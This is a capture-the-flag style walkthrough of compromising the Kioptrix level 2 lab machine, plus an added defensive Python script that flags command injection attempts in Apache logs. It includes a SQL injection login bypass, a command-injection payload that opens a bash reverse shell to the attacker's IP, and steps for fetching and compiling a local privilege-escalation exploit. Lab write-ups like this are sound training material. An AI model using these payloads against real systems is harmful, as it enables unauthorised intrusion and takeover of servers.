Kioptrix updated – level2

Step 1:

Reconnaissance (finding the network):

First, we need to know which network we are on by finding our host IP address.

So we are on the network 192.168.1.0 with subnet mask 255.255.255.0, and our Kali IP is 192.168.1.34.

Step 2:

Finding remote hosts and detecting the vulnerable target host:

Using nmap to scan for open ports and the services running on them.

Open ports are: 22, 80, 111, 443, 631 (IPP, the protocol for network printers), 844, 3306

Since port 80 is open alongside MySQL on port 3306, we can guess that there is a web page backed by a database.

Step 3:

Exploiting Vulnerability

Let's check for the classic (golden) basic SQL injection vulnerability:

DONE! We exploited the SQL injection vulnerability. But when the new web page appears (like below), there is no button for submitting data (POST/GET)! That is a bit strange. Let's find a way to work around it. 🙂

I used Burp Suite Community Edition to capture and modify the request/response parameters sent to the web server.

Make sure Intercept is ON and click Open Browser. Then enter the address of the web server, in this case http://192.168.1.102

Now redo the SQL injection, this time through Burp Suite, and look at which parameters are passed between client and server.

Now, if we inspect the page, we can see that an HTML error causes the SUBMIT button to disappear. But we can still identify the parameters that need to be passed to the web server and the PHP page the form action points to: the "ip" parameter, the "submit" button, and the pingit.php page.

In the above, right-click on the packet received from 192.168.1.102 and choose Send to Repeater, which lets us EDIT the request.

Below, change the action PHP page and adjust our parameters. Then click the orange SEND button and look at the RESPONSE window. We get the result. BOOM!

Now, for simplicity, rather than sending every single packet through Burp Suite, we tell the server to establish a reverse shell to our system (the attacker). Using the nc command we open port 444, listen on it and wait for the server to connect.

Enter the following command:

127.0.0.1;bash -i >& /dev/tcp/192.168.1.34/444 0>&1

Notice: for every single WHITE SPACE we put %20 and for the & sign we put %26 (spaces and special characters must be sent URL-encoded as their corresponding codes).

We get a shell. But by issuing an id command we can see that our user (apache) does not have enough privileges. It is not ROOT yet.
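From the defender's side, the reason the ip parameter of pingit.php can carry a command is that it is handed to a shell without being checked; the same check that would have prevented it also flags the attempt in the web server's access log. The script below is an added example, not code from the original post or from the Kioptrix VM: it applies the validation pingit.php should have done (accept only a literal IP address) to constructed Apache log lines, one of which carries the URL-encoded payload from this walkthrough in the query string (assumed there purely so it is visible in a standard access log).

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not taken from the original post).
# The second request carries the walkthrough's payload, URL-encoded as the
# post describes (%20 for a space, %26 for '&').
SAMPLE_LOG = """\
192.168.1.34 - - [20/Oct/2021:18:01:02 +0000] "GET /pingit.php?ip=127.0.0.1&submit=submit HTTP/1.1" 200 512
192.168.1.34 - - [20/Oct/2021:18:01:40 +0000] "GET /pingit.php?ip=127.0.0.1;bash%20-i%20>%26%20/dev/tcp/192.168.1.34/444%200>%261&submit=submit HTTP/1.1" 200 0
192.168.1.50 - - [20/Oct/2021:18:02:11 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# Source address, method and request target from a combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# Characters that let a value break out of a single ping command.
SHELL_META = set(';&|`$<>\n')


def is_valid_ip(value):
    """The check pingit.php should apply before calling ping: accept only a
    literal IPv4/IPv6 address. Anything else must never reach a shell."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def find_injection_attempts(log_text):
    """Return (source, decoded_ip_value, metacharacters_found) for every
    pingit.php request whose 'ip' parameter is not a bare IP address."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/pingit.php":
            continue
        # parse_qs splits on the literal '&' first, then percent-decodes each
        # value, so the encoded %26 comes back as '&' inside the ip value.
        for value in parse_qs(url.query).get("ip", []):
            if not is_valid_ip(value):
                meta = sorted(c for c in SHELL_META if c in value)
                hits.append((m.group("src"), value, meta))
    return hits


if __name__ == "__main__":
    for src, value, meta in find_injection_attempts(SAMPLE_LOG):
        print(f"{src}: suspicious ip={value!r} shell metacharacters={meta}")
```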

Step 4:

Privilege Escalation

We know the server is running CentOS 4.5.

A quick search on exploit-db gives us an exploit to escalate privileges.

We cannot use wget from the victim machine to fetch it (it is not connected to the internet). So we download the exploit on the Kali system, start the apache2 web server on Kali, and then download the exploit from Kali to the victim.

After the exploit is downloaded on Kali, we need to change to a directory on the victim where we have write and compile privileges (to compile and run the exploit), so we move to /tmp, download it from Kali, compile it and run it.
